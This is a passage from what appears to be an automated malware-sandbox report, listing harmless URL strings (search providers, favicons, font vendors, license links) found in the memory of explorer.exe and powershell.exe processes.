          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 0000001D.00000000.438285871.000000000E6F0000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 0000001D.00000000.438285871.000000000E6F0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: powershell.exe, 00000016.00000003.357677144.000001C2544E4000.00000004.00000001.sdmp, explorer.exe, 0000001D.00000000.434979784.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: powershell.exe, 00000016.00000003.357677144.000001C2544E4000.00000004.00000001.sdmp, powershell.exe, 00000016.00000003.358093159.000001C2548A5000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 0000001D.00000000.426386569.0000000006840000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 0000001D.00000000.434979784.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 0000001D.00000000.434979784.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 0000001D.00000000.434979784.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 0000001D.00000000.434979784.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 0000001D.00000000.434979784.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 0000001D.00000000.434979784.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 0000001D.00000000.434979784.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 0000001D.00000000.434979784.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 0000001D.00000000.434979784.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 0000001D.00000000.434979784.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 0000001D.00000000.434979784.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 0000001D.00000000.434979784.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 0000001D.00000000.434979784.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 0000001D.00000000.434979784.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 0000001D.00000000.434979784.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 0000001D.00000000.434979784.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 0000001D.00000000.433099386.0000000008BE5000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.pngLMEM
          Source: explorer.exe, 0000001D.00000000.432981582.0000000008B88000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/images/errors/robot.pngLMEM
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 0000001D.00000000.434979784.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 0000001D.00000000.439355548.000000000E7E3000.00000002.00000001.sdmpString